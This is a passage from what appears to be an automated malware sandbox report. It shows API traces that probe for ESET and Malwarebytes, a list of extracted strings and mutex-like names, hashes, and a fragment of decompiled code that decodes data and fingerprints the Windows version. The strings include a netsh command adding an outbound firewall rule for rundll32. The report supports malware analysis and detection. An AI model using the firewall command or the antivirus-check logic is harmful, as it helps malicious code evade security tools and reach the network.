                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004019DD
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004019E7
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004019F1
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004019FB
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401A05
                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\ESET,00000000,00020019,004433FC,00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000), ref: 00401A20
                                                                • ExitThread.KERNEL32(80000001,Software\ESET,00000000,00020019,004433FC,00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000), ref: 00401A29
                                                                • RegOpenKeyExA.ADVAPI32(80000002,SYSTEM\ControlSet001\Services\MBAMService,00000000,00020019,004433FC,80000001,Software\ESET,00000000,00020019,004433FC,00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d), ref: 00401A45
                                                                • ExitThread.KERNEL32(80000002,SYSTEM\ControlSet001\Services\MBAMService,00000000,00020019,004433FC,80000001,Software\ESET,00000000,00020019,004433FC,00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d), ref: 00401A4E
                                                                Strings
                                                                • 9b765102-98e7-43e2-a003-f8cbdfab8a64, xrefs: 00401654
                                                                • P79zA00FfF3, xrefs: 004013B6
                                                                • 17689d7a-89bf-4e2a-a49c-9e4e5a51a9d7, xrefs: 00401622
                                                                • 82c69af7-f8f5-44ee-a172-4f909c61056d, xrefs: 00401924
                                                                • NetworkLighter, xrefs: 004019C4
                                                                • ASUSNet20, xrefs: 00401780
                                                                • OnlineShopFinder, xrefs: 00401398
                                                                • 1f1769de-42fa-4883-b37c-f0de488de557, xrefs: 00401438
                                                                • SYSTEM\ControlSet001\Services\MBAMService, xrefs: 00401A3B
                                                                • Tropic819331, xrefs: 00401348
                                                                • PJOQT7WD1SAOM, xrefs: 004019D8
                                                                • BlueEye, xrefs: 0040187A
                                                                • 248c3593-c2fb-4734-84f8-5847c460f1d9, xrefs: 004016A4
                                                                • 4d6a57e9-e692-4da2-8ba8-adb25645e4b8, xrefs: 0040149C
                                                                • CBKZiOPASRHKL, xrefs: 0040188E
                                                                • 92e718ff-ce92-4562-8bf2-bbf15923034d, xrefs: 00401816
                                                                • UEFIConfig, xrefs: 004012F3
                                                                • NMOZAQcxzER, xrefs: 0040185C
                                                                • ImageCreator_v4.2, xrefs: 0040141A
                                                                • NeonRhythmbox, xrefs: 00401366
                                                                • China4150039, xrefs: 00401866
                                                                • 3ffd4715-4991-4bc8-9c51-2e3aeb6e737e, xrefs: 0040147E
                                                                • FamilyWeekend, xrefs: 00401456
                                                                • sqlcasheddbm, xrefs: 004013D4
                                                                • fbac80bd-ba6a-4cd5-92d9-3a31a87f7af6, xrefs: 004014C4
                                                                • ad0482d7-c686-4267-8b7b-352cdf811081, xrefs: 004016D6
                                                                • RaringRingtail, xrefs: 0040138E
                                                                • Hk4kKLL0ZAF8a, xrefs: 00401884
                                                                • 6b264507-ba91-4d85-86c9-1e827315cbe0, xrefs: 0040146A
                                                                • I0N8129AZR1A, xrefs: 004019F6
                                                                • e3024a8f-3f2b-4e06-ac36-0997c1090d00, xrefs: 004016FE
                                                                • 0e22932c-5c83-43e2-9133-8de798150a45, xrefs: 00401668
                                                                • f967041f-20dd-4d31-a34a-f5e04bdfdf7b, xrefs: 0040165E
                                                                • 4e5e7d5e-a1fe-4de7-ad53-5f4aaecd7402, xrefs: 004015FA
                                                                • 48353b4f-51f9-4961-bcc1-c8d5163a8978, xrefs: 00401514
                                                                • d5210d2e-261f-47b9-8fe1-d54c87e4d188, xrefs: 004017F8
                                                                • 5e76294a-2787-4ae2-9ddc-b792b0c45ec2, xrefs: 004015B4
                                                                • 2a942be2-9252-4d60-9483-3651a92192a5, xrefs: 004014A6
                                                                • 7eb5ccec-3fd7-4826-b681-02a6129aa108, xrefs: 004014CE
                                                                • MLIXNJAEGPSE, xrefs: 00401A00
                                                                • 67f4e0eb-54cc-4779-b3c3-fe277c8478ae, xrefs: 004015E6
                                                                • ee1b9fe7-c3c5-414f-b4af-e0e8dbd5a7ab, xrefs: 004016C2
                                                                • 16ed8dab-ee6b-44ea-8cea-31c66d6864b9, xrefs: 0040174E
                                                                • Software\ESET, xrefs: 00401A16
                                                                • RedParrot, xrefs: 004018C0
                                                                • 5aaaf791-e9a2-4ea1-94d3-d5773c53e823, xrefs: 00401942
                                                                • 056c197d-b3e0-4bae-b639-97cccbc504ef, xrefs: 0040171C
                                                                • d483fc17-c43d-4259-81c4-1668415ee2c5, xrefs: 004016B8
                                                                • 15417794-7485-46f6-9965-d34730ea0f48, xrefs: 00401550
                                                                • 8265348b-1cfc-4ae1-a2b9-a340ddb7584b, xrefs: 004018E8
                                                                • 25d80e35-cd4a-4a53-b946-58fe096652aa, xrefs: 00401974
                                                                • ARScenes, xrefs: 004017BC
                                                                • MovieFinder, xrefs: 00401460
                                                                • 5440d9f2-2c16-411f-8204-a206c9c20cd4, xrefs: 00401636
                                                                • 1e8e5806-2e99-4002-b62c-7a78a6641874, xrefs: 00401564
                                                                • 3G1S91V5ZA5fB56W, xrefs: 00401352
                                                                • 5ad5f7a9-940c-4f1d-b77a-d6b0028ce4e5, xrefs: 00401834
                                                                • 138be83c-2a52-4c31-9ee8-bfd4eac53d72, xrefs: 0040150A
                                                                • 60f8896b-a437-4e79-9e29-96522ca88c4c, xrefs: 004015DC
                                                                • advfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe", xrefs: 00401AD9, 00401AE8
                                                                • 1cce886d-1841-4e18-963b-15f2e90a3c44, xrefs: 004016EA
                                                                • 9f093bf8-480b-414c-a8e8-5d9c6da83576, xrefs: 004016F4
                                                                • SYSTEM\ControlSet001\Services\MBAMService, xrefs: 00401A60
                                                                • wwallmutex, xrefs: 004013E8
                                                                • dec0f5aa-1fd1-458f-916c-693887610891, xrefs: 0040158C
                                                                • 8AZB70HDFK0WOZIZ, xrefs: 00401410
                                                                • 55731fe5-97ad-47dc-953f-37a8aca1451b, xrefs: 00401712
                                                                • 3c159c86-0e90-47d1-ad37-788c00ba2948, xrefs: 00401708
                                                                • InRAMQueue, xrefs: 00401848
                                                                • 722cbc3c-acc8-4296-a8dd-7d06e5ca7d57, xrefs: 004014B0
                                                                • ATYNKAJP30Z9AQ, xrefs: 004019E2
                                                                • 1e6c0ff8-36c6-48d8-8aaa-e323bda29f72, xrefs: 0040180C
                                                                • b3e32042-d969-43d1-b20c-bcf8da5ba436, xrefs: 004014EC
                                                                • PSHZ73VLLOAFB, xrefs: 004019CE
                                                                • 39309b80-cef5-4ce1-b215-0719723c4c30, xrefs: 00401578
                                                                • ab7d92f2-968a-461e-9da6-e569dedb0a91, xrefs: 00401730
                                                                • MK5Cheats, xrefs: 004018B6
                                                                • VHO9AZB7HDK0WAZMM, xrefs: 00401406
                                                                • dad17f2e-5f30-4313-b1c3-5ae8c2149757, xrefs: 00401474
                                                                • D1JozWrldD, xrefs: 004013CA
                                                                • b22d1dd8-e3ea-4764-ba9b-0ebf41fddee7, xrefs: 004015C8
                                                                • 168cb052-69eb-45be-be07-d4f323dc67d6, xrefs: 00401532
                                                                • 661f7562-d95a-47d4-866d-09e98860b559, xrefs: 0040169A
                                                                • 274f61dd-3fed-4bfe-9aa6-8a012339a41f, xrefs: 00401528
                                                                • FoloDrite, xrefs: 0040144C
                                                                • 6a833436-8b37-450b-9753-8cc18364fa88, xrefs: 00401686
                                                                • 172821eb-729d-4307-a56f-63063b2677de, xrefs: 004015AA
                                                                • 2af4e2d5-a194-4fda-9f51-273b7773809a, xrefs: 00401672
                                                                • fb57b45a-96d9-4d63-a647-b25d2791d29a, xrefs: 004018D4
                                                                • 4183ac02-58d3-4c92-9bc9-4b2ed14ec23d, xrefs: 0040182A
                                                                • MDISequencer, xrefs: 0040135C
                                                                • VirginPoint, xrefs: 004015F0
                                                                • 3a05a152-1218-4f2e-bc7b-af84ef60a824, xrefs: 004018CA
                                                                • 12a2c0fc-00d2-4614-b4ae-c18eb500a088, xrefs: 004014BA
                                                                • f378f238-6503-4544-8e43-cbe4bbf3615e, xrefs: 00401618
                                                                • 85e6784c-7904-41ee-99b4-8b286e19da70, xrefs: 00401744
                                                                • fd07e79d-a21b-42d1-aae3-02b6a3214745, xrefs: 00401906
                                                                • JerkPatrol, xrefs: 00401604
                                                                • 4e1ac580-d3cf-4961-81eb-072dff249c17, xrefs: 00401726
                                                                • b020bf06-0b65-4c58-943d-7b4744c747ff, xrefs: 0040199C
                                                                • a25725fa-ff4a-4054-bd35-0e251a442ab5, xrefs: 00401910
                                                                • 4d5ebeec-8fbb-4141-bc39-80880963e1cd, xrefs: 00401988
                                                                • SoloWrite, xrefs: 004017DA
                                                                • f8f80b68-1a16-456d-ad13-e840f4f0a8e7, xrefs: 00401956
                                                                • \system32\rundll32.exe, xrefs: 00401AC5
                                                                • 57c36285-eae0-4d1f-ac9d-af9e90ae071b, xrefs: 0040196A
                                                                • ed3a7d1d-ed6f-4c8f-86d4-44dcde3b32f8, xrefs: 0040173A
                                                                • 00082fbb-a419-43f4-bd80-e3631ebbf4c8, xrefs: 0040155A
                                                                • RouteMatrix, xrefs: 004013C0
                                                                • KDOWEtRVAB, xrefs: 004013AC
                                                                • 8261c49a-840f-455a-be28-6df62391ec09, xrefs: 004017EE
                                                                • NNDRIOZ8933, xrefs: 00401776
                                                                • beb41e13-5e33-450f-a9c5-3e5a382d224d, xrefs: 004015D2
                                                                • cf3573d5-bf4f-4094-bbea-ced8efde2257, xrefs: 0040153C
                                                                • IwS01003993, xrefs: 004012FD
                                                                • 0d5c9cd4-30e1-4f21-9652-8382318d8912, xrefs: 00401992
                                                                • 2707952b-6f11-481e-99be-b28317af8e3d, xrefs: 00401802
                                                                • e0e6ea1b-d3d8-4802-abd2-bf6c69f72b6f, xrefs: 004016AE
                                                                • a9f5b4a5-2717-4e99-b6a0-6af4bdb042d3, xrefs: 0040197E
                                                                • d86a1229-2cb7-409b-a3de-5366eec3db90, xrefs: 00401640
                                                                • 2c0c5f0d-6ad7-4c97-b1a8-2c706d03a4f8, xrefs: 0040164A
                                                                • NattyNarwhal, xrefs: 004017B2
                                                                • c3c2a8b3-fc8a-4fe3-8f24-6f2a757a5012, xrefs: 0040156E
                                                                • LenovoSuite, xrefs: 00401370
                                                                • ee67405a-96ab-46be-b946-ec5875d07506, xrefs: 00401690
                                                                • MaverickMeerkat, xrefs: 004019B0
                                                                • PrecisePangolin, xrefs: 0040160E
                                                                • SSDOptimizerV13, xrefs: 004017E4
                                                                • VividVervet, xrefs: 004017D0
                                                                • JKLSXX1ZA1QRLER, xrefs: 004019EC
                                                                • UtopicUnicorn, xrefs: 004018F2
                                                                • MLIXNJ9AEGPSE, xrefs: 0040176C
                                                                • 9edc5c75-3e29-47fc-9c7c-ba1c2324d880, xrefs: 0040194C
                                                                • NeoNetPlasma, xrefs: 00401762
                                                                • 069e4409-bd54-4a1f-8e37-49da2cf6a537, xrefs: 0040162C
                                                                • PCV5ATULCN, xrefs: 00401311
                                                                • 8f1a37f6-9cff-447e-a00c-cb19512de134, xrefs: 00401582
                                                                • ae9d0e68-96ca-4731-92de-961d5ef283eb, xrefs: 0040192E
                                                                • 3cd8820e-b1ae-49da-8211-ef45bc4fa61e, xrefs: 00401938
                                                                • 2707952b-6f11-481e-99be-b28317af8e3d, xrefs: 0040131B, 00401320
                                                                • RaspberryManualViewer, xrefs: 004017A8
                                                                • CryptoMaxima, xrefs: 0040183E
                                                                • bitcoreguard, xrefs: 00401384
                                                                • 197a1689-8bb1-4fcd-80e9-32b86e3751f5, xrefs: 00401546
                                                                • WinDuplicity, xrefs: 004018A2
                                                                • VirtualPrinterDriver, xrefs: 00401820
                                                                • StreamCoder1.0, xrefs: 0040179E
                                                                • ca1b68fd-56d5-4355-94b2-ed6ab0857890, xrefs: 004014F6
                                                                • 240187f4-b097-4a3c-a6fa-2ca5b1e0b373, xrefs: 00401442
                                                                • 5962654a-a395-4714-96f2-2419ab2172bf, xrefs: 004015A0
                                                                • 92f6b93e-fa07-4234-8eb6-798d555e587e, xrefs: 004018DE
                                                                • QOSUser2.r10, xrefs: 00401794
                                                                • FMPsDSCV0l, xrefs: 004013F2
                                                                • b26b112a-40eb-48db-a71d-26ac92ea1ad9, xrefs: 004019A6
                                                                • HTTPBalancer_v2.15, xrefs: 00401852
                                                                • 3f78ca48-011c-4ffb-abfa-c9f659e4a820, xrefs: 00401500
                                                                • OMXBJSJ3WA1ZIN, xrefs: 00401758
                                                                • 62e64ec9-d662-4595-bf77-634764dcf810, xrefs: 004014E2
                                                                • b77cf13b-45d7-45c1-a62f-c1bc7c20482d, xrefs: 00401960
                                                                • 0ca9a8d3-01bf-4f9e-bfc7-7eb51e67e0c4, xrefs: 0040167C
                                                                • 27a0f05f-41fa-43f1-86b9-7e48bde3d716, xrefs: 004014D8
                                                                • fe711d65-f31a-4c22-a12f-cec65d231941, xrefs: 00401492
                                                                • VirtualDesktopKeeper, xrefs: 00401898
                                                                • BiosChecksumChecker, xrefs: 004019BA
                                                                • a01769e5-9936-4aab-be50-ea37f03ab9f9, xrefs: 0040191A
                                                                • N800HANOI, xrefs: 00401307
                                                                • VideoBind, xrefs: 0040137A, 004013DE
                                                                • 1a379834-6135-41e7-9cf7-e79a9f705fbc, xrefs: 004016E0
                                                                • QuantalQuetzal, xrefs: 0040178A
                                                                • 9f7e0dc2-bc5c-497e-aa70-f8072e71550c, xrefs: 0040151E
                                                                • IntelBIOSReader, xrefs: 004018AC
                                                                • 25f07256-3b46-4531-aa3e-e1729d9aa7cb, xrefs: 004015BE
                                                                • CDNetStreamer2.r05, xrefs: 0040142E
                                                                • VRK1AlIXBJDA5U3A, xrefs: 0040133E
                                                                • China1839099, xrefs: 00401424
                                                                • NetRegistry, xrefs: 00401870
                                                                • NHO9AZB7HDK0WAZMM, xrefs: 004013A2
                                                                • d8ba5865-ac00-4df1-8437-eb144077e031, xrefs: 00401596
                                                                • FixLCD, xrefs: 004013FC
                                                                • fda765a3-b5a2-4417-9097-3b18dc6fe6fb, xrefs: 00401488
                                                                • OneiricOcelot, xrefs: 004018FC
                                                                • WireDefender, xrefs: 004017C6
                                                                • 049a72ba-fac1-4970-baea-d08d0abf0a99, xrefs: 004016CC
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Exit$Thread$User$Open$Mutex$Process$AllocCreateHeap
                                                                • String ID: 00082fbb-a419-43f4-bd80-e3631ebbf4c8$049a72ba-fac1-4970-baea-d08d0abf0a99$056c197d-b3e0-4bae-b639-97cccbc504ef$069e4409-bd54-4a1f-8e37-49da2cf6a537$0ca9a8d3-01bf-4f9e-bfc7-7eb51e67e0c4$0d5c9cd4-30e1-4f21-9652-8382318d8912$0e22932c-5c83-43e2-9133-8de798150a45$12a2c0fc-00d2-4614-b4ae-c18eb500a088$138be83c-2a52-4c31-9ee8-bfd4eac53d72$15417794-7485-46f6-9965-d34730ea0f48$168cb052-69eb-45be-be07-d4f323dc67d6$16ed8dab-ee6b-44ea-8cea-31c66d6864b9$172821eb-729d-4307-a56f-63063b2677de$17689d7a-89bf-4e2a-a49c-9e4e5a51a9d7$197a1689-8bb1-4fcd-80e9-32b86e3751f5$1a379834-6135-41e7-9cf7-e79a9f705fbc$1cce886d-1841-4e18-963b-15f2e90a3c44$1e6c0ff8-36c6-48d8-8aaa-e323bda29f72$1e8e5806-2e99-4002-b62c-7a78a6641874$1f1769de-42fa-4883-b37c-f0de488de557$240187f4-b097-4a3c-a6fa-2ca5b1e0b373$248c3593-c2fb-4734-84f8-5847c460f1d9$25d80e35-cd4a-4a53-b946-58fe096652aa$25f07256-3b46-4531-aa3e-e1729d9aa7cb$2707952b-6f11-481e-99be-b28317af8e3d$2707952b-6f11-481e-99be-b28317af8e3d$274f61dd-3fed-4bfe-9aa6-8a012339a41f$27a0f05f-41fa-43f1-86b9-7e48bde3d716$2a942be2-9252-4d60-9483-3651a92192a5$2af4e2d5-a194-4fda-9f51-273b7773809a$2c0c5f0d-6ad7-4c97-b1a8-2c706d03a4f8$39309b80-cef5-4ce1-b215-0719723c4c30$3G1S91V5ZA5fB56W$3a05a152-1218-4f2e-bc7b-af84ef60a824$3c159c86-0e90-47d1-ad37-788c00ba2948$3cd8820e-b1ae-49da-8211-ef45bc4fa61e$3f78ca48-011c-4ffb-abfa-c9f659e4a820$3ffd4715-4991-4bc8-9c51-2e3aeb6e737e$4183ac02-58d3-4c92-9bc9-4b2ed14ec23d$48353b4f-51f9-4961-bcc1-c8d5163a8978$4d5ebeec-8fbb-4141-bc39-80880963e1cd$4d6a57e9-e692-4da2-8ba8-adb25645e4b8$4e1ac580-d3cf-4961-81eb-072dff249c17$4e5e7d5e-a1fe-4de7-ad53-5f4aaecd7402$5440d9f2-2c16-411f-8204-a206c9c20cd4$55731fe5-97ad-47dc-953f-37a8aca1451b$57c36285-eae0-4d1f-ac9d-af9e90ae071b$5962654a-a395-4714-96f2-2419ab2172bf$5aaaf791-e9a2-4ea1-94d3-d5773c53e823$5ad5f7a9-940c-4f1d-b77a-d6b0028ce4e5$5e76294a-2787-4ae2-9ddc-b792b0c45ec2$60f8896b-a437-4e79-9e29-96522ca88c4c$62e64ec9-d662-4595-bf77-634764dcf810$661f7562-d95a-47d4-866d-09e98860b559$67f4e0eb-54cc-4779-b3c3-fe277c8478ae$6a833436-8b37-450b-9753-8cc18364fa88$6b264507-ba91-4d85-86c9-1e827315cbe0$722cbc3c-acc8-4296-a8dd-7d06e5ca7d57$7eb5ccec-3fd7-4826-b681-02a6129aa108$8261c49a-840f-455a-be28-6df62391ec09$8265348b-1cfc-4ae1-a2b9-a340ddb7584b$82c69af7-f8f5-44ee-a172-4f909c61056d$85e6784c-7904-41ee-99b4-8b286e19da70$8AZB70HDFK0WOZIZ$8f1a37f6-9cff-447e-a00c-cb19512de134$92e718ff-ce92-4562-8bf2-bbf15923034d$92f6b93e-fa07-4234-8eb6-798d555e587e$9b765102-98e7-43e2-a003-f8cbdfab8a64$9edc5c75-3e29-47fc-9c7c-ba1c2324d880$9f093bf8-480b-414c-a8e8-5d9c6da83576$9f7e0dc2-bc5c-497e-aa70-f8072e71550c$ARScenes$ASUSNet20$ATYNKAJP30Z9AQ$BiosChecksumChecker$BlueEye$CBKZiOPASRHKL$CDNetStreamer2.r05$China1839099$China4150039$CryptoMaxima$D1JozWrldD$FMPsDSCV0l$FamilyWeekend$FixLCD$FoloDrite$HTTPBalancer_v2.15$Hk4kKLL0ZAF8a$I0N8129AZR1A$ImageCreator_v4.2$InRAMQueue$IntelBIOSReader$IwS01003993$JKLSXX1ZA1QRLER$JerkPatrol$KDOWEtRVAB$LenovoSuite$MDISequencer$MK5Cheats$MLIXNJ9AEGPSE$MLIXNJAEGPSE$MaverickMeerkat$MovieFinder$N800HANOI$NHO9AZB7HDK0WAZMM$NMOZAQcxzER$NNDRIOZ8933$NattyNarwhal$NeoNetPlasma$NeonRhythmbox$NetRegistry$NetworkLighter$OMXBJSJ3WA1ZIN$OneiricOcelot$OnlineShopFinder$P79zA00FfF3$PCV5ATULCN$PJOQT7WD1SAOM$PSHZ73VLLOAFB$PrecisePangolin$QOSUser2.r10$QuantalQuetzal$RaringRingtail$RaspberryManualViewer$RedParrot$RouteMatrix$SSDOptimizerV13$SYSTEM\ControlSet001\Services\MBAMService$SYSTEM\ControlSet001\Services\MBAMService$Software\ESET$SoloWrite$StreamCoder1.0$Tropic819331$UEFIConfig$UtopicUnicorn$VHO9AZB7HDK0WAZMM$VRK1AlIXBJDA5U3A$VideoBind$VirginPoint$VirtualDesktopKeeper$VirtualPrinterDriver$VividVervet$WinDuplicity$WireDefender$\system32\rundll32.exe$a01769e5-9936-4aab-be50-ea37f03ab9f9$a25725fa-ff4a-4054-bd35-0e251a442ab5$a9f5b4a5-2717-4e99-b6a0-6af4bdb042d3$ab7d92f2-968a-461e-9da6-e569dedb0a91$ad0482d7-c686-4267-8b7b-352cdf811081$advfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"$ae9d0e68-96ca-4731-92de-961d5ef283eb$b020bf06-0b65-4c58-943d-7b4744c747ff$b22d1dd8-e3ea-4764-ba9b-0ebf41fddee7$b26b112a-40eb-48db-a71d-26ac92ea1ad9$b3e32042-d969-43d1-b20c-bcf8da5ba436$b77cf13b-45d7-45c1-a62f-c1bc7c20482d$beb41e13-5e33-450f-a9c5-3e5a382d224d$bitcoreguard$c3c2a8b3-fc8a-4fe3-8f24-6f2a757a5012$ca1b68fd-56d5-4355-94b2-ed6ab0857890$cf3573d5-bf4f-4094-bbea-ced8efde2257$d483fc17-c43d-4259-81c4-1668415ee2c5$d5210d2e-261f-47b9-8fe1-d54c87e4d188$d86a1229-2cb7-409b-a3de-5366eec3db90$d8ba5865-ac00-4df1-8437-eb144077e031$dad17f2e-5f30-4313-b1c3-5ae8c2149757$dec0f5aa-1fd1-458f-916c-693887610891$e0e6ea1b-d3d8-4802-abd2-bf6c69f72b6f$e3024a8f-3f2b-4e06-ac36-0997c1090d00$ed3a7d1d-ed6f-4c8f-86d4-44dcde3b32f8$ee1b9fe7-c3c5-414f-b4af-e0e8dbd5a7ab$ee67405a-96ab-46be-b946-ec5875d07506$f378f238-6503-4544-8e43-cbe4bbf3615e$f8f80b68-1a16-456d-ad13-e840f4f0a8e7$f967041f-20dd-4d31-a34a-f5e04bdfdf7b$fb57b45a-96d9-4d63-a647-b25d2791d29a$fbac80bd-ba6a-4cd5-92d9-3a31a87f7af6$fd07e79d-a21b-42d1-aae3-02b6a3214745$fda765a3-b5a2-4417-9097-3b18dc6fe6fb$fe711d65-f31a-4c22-a12f-cec65d231941$sqlcasheddbm$wwallmutex
                                                                • API String ID: 3445501446-3183811682
                                                                • Opcode ID: cfbde93db29b1edd6808ee5b6ffd24fa3fdce0254b8273481c8a035cbcdd8b6b
                                                                • Instruction ID: c715ef687bf62ee333e3cbcc6b1b2154ff4374b6bed88832cccde487d671112c
                                                                • Opcode Fuzzy Hash: cfbde93db29b1edd6808ee5b6ffd24fa3fdce0254b8273481c8a035cbcdd8b6b
                                                                • Instruction Fuzzy Hash: 80F18054642151D6DE5473F34443A0B1016AB9A788F20E4BFF990BAAFFCB7C8A03576E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004024B7, Relevance: 42.3, APIs: 14, Strings: 10, Instructions: 262stringCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 45%
                                                                			E004024B7(void* __eax) {
				intOrPtr _v4;
				char _v5;
				char _v6;
				void* _t18;
				intOrPtr _t25;
				CHAR* _t27;
				long _t40;
				struct HINSTANCE__* _t43;
				intOrPtr* _t50;
				void* _t52;
				intOrPtr _t58;
				CHAR* _t60;
				char* _t61;
				signed int _t63;
				int _t71;
				int _t72;
				void* _t78;
				void* _t79;
				intOrPtr _t80;
				signed char* _t82;
				signed char* _t83;
				void* _t85;
				void* _t86;
				CHAR* _t88;
				CHAR* _t89;
				CHAR* _t90;
				CHAR* _t92;
				char* _t93;
				signed char* _t96;
				CHAR* _t97;
				void* _t100;
				intOrPtr* _t101;

				_t79 =  *0x440860; // 0x36a1020
				_t96 = 0x402b63;
				_t1 = _t79 + 0x408; // 0x36a1428
				_t58 = _t1;
				_t78 = 0x14b;
				_t18 = 0;
				do {
					asm("lodsb");
					if(_t18 != 0x17) {
						asm("stosb");
						goto L5;
					}
					_t63 =  *_t96 & 0x000000ff;
					_t18 = memset(_t79, 0, _t63 << 0);
					_t100 = _t100 + 0xc;
					_t79 = _t79 + _t63;
					_t96 =  &(_t96[1]);
					_t78 = _t78 - 1;
					if(_t78 == 0) {
						break;
					} else {
					}
					L5:
					_t78 = _t78 - 1;
				} while (_t78 != 0);
				_t80 = _t58;
				asm("lodsb");
				asm("stosb");
				asm("loop 0xfffffffe");
				 *0x43f5a2 = _t80;
				asm("lodsb");
				asm("stosb");
				asm("loop 0xfffffffe");
				_t82 = _t80;
				 *_t82 =  ~( *_t82);
				asm("rol byte [edi], 1");
				 *_t82 =  ~( *_t82);
				_t83 =  &(_t82[1]);
				 *_t83 =  ~( *_t83);
				asm("rol byte [edi], 0x6");
				 *_t83 =  ~( *_t83);
				asm("loop 0xfffffff1");
				_t85 = _t82;
				_t86 = _t85 - 4;
				 *((intOrPtr*)(_t86 - 4)) = 0xe1df0233;
				memset(_t86, 0, 8 << 0);
				_t101 = _t100 + 0xc;
				_push(_t96);
				_push(_t79);
				_t60 = _t86 + 8;
				_t88 = GetCommandLineA();
				_t71 = lstrlenA(_t88);
				while(1) {
					asm("repne scasb");
					if(_t71 == 0) {
						break;
					}
					if( *_t88 != 0x69627573) {
						continue;
					} else {
						_t89 =  &(_t88[6]);
						_t97 = _t89;
						asm("repne scasb");
						if( *((char*)(_t89 - 1)) == 0x20) {
							 *((char*)(_t89 - 1)) = 0;
						}
						_t25 = E0043C890(_t97);
						 *0x43f3bc = _t89;
						_t90 = _t60;
						 *0x440250 = _t25;
						asm("stosd");
						lstrcpyA(_t90, _t97);
						_t27 =  *0x43f3bc; // 0x753499
						 *((char*)(_t27 - 1)) = 0x20;
						_t61 =  &(_t90[0x32]);
						_t92 = GetCommandLineA();
						_t72 = lstrlenA(_t92);
						while(1) {
							asm("repne scasb");
							if(_t72 == 0) {
								break;
							}
							if( *_t92 != 0x69627570 || _t92[4] != 0x3d64) {
								continue;
							} else {
								if((_t92[6] & 0x000000ff) == 0x20) {
								}
								L24:
								_t93 = _t61;
								asm("stosb");
								asm("stosd");
								asm("stosd");
								asm("stosd");
								asm("stosb");
								RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20019, 0x440398); // executed
								 *0x440394 = 0x100;
								RegQueryValueExA( *0x440398, "ProductName", 0, 0x443400, "Windows 10 Enterprise", 0x440394); // executed
								RegCloseKey( *0x440398); // executed
								_t40 = GetVersion();
								if(_t40 != 5) {
									L27:
									if(_t40 != 5 || _t40 != 1) {
										if(_t40 != 6) {
											L33:
											if(_t40 != 6 || _t40 != 1) {
												if(_t40 != 6 || _t40 != 2) {
													if(_t40 != 6 || _t40 != 3) {
														if(_t40 != 6 || _t40 != 4) {
															if(_t40 == 0xa) {
															}
														}
													}
												}
											}
											goto L47;
										}
										_t40 = _t40;
										if(_t40 != 0) {
											goto L33;
										}
										goto L47;
									} else {
										L47:
										if( *0x44029c == 0x31) {
										}
										asm("stosb");
										_t43 = GetModuleHandleA("kernel32");
										if(_t43 == 0) {
											asm("stosb");
										} else {
											_t50 = GetProcAddress(_t43, "IsWow64Process");
											if(_t50 == 0 || _t50 == 0xffffffff) {
												asm("stosb");
											} else {
												_t52 = GetCurrentProcess();
												 *_t50(0x440254, _t93);
												_t93 = _t52;
												asm("stosb");
											}
										}
										if( *0x4433cf != 0) {
										}
										asm("stosb");
										asm("pushad");
										asm("lodsw");
										asm("rol ax, 0xd");
										asm("stosw");
										asm("loop 0xfffffff8");
										asm("popad");
										E004027CD();
										ExitProcess(??);
										if(0x4468ea <= 0) {
											ExitProcess();
											return 0x4468ea;
										} else {
											_push(0x4468ea);
											_push(_t78);
											_push(2);
											_v6 = 0x52;
											_v6 = _v6 - 5;
											_v5 = 0x5a;
											_v4 = 0x30090;
											_push(0x55fb);
											_push( *0x440860);
											 *_t101 =  *_t101 - 0xeac38f;
											 *_t101 =  *_t101 + 0xeac391;
											 *_t101 =  *_t101 + 3;
											_push(0x4468ea);
											_push(5);
											_push(_t101 + 0x12);
											_push(0x4468ea);
											_push(0x4027f1);
											 *_t101 =  *_t101 + 1;
											return 0x4468ea;
										}
									}
								}
								_t40 = _t40;
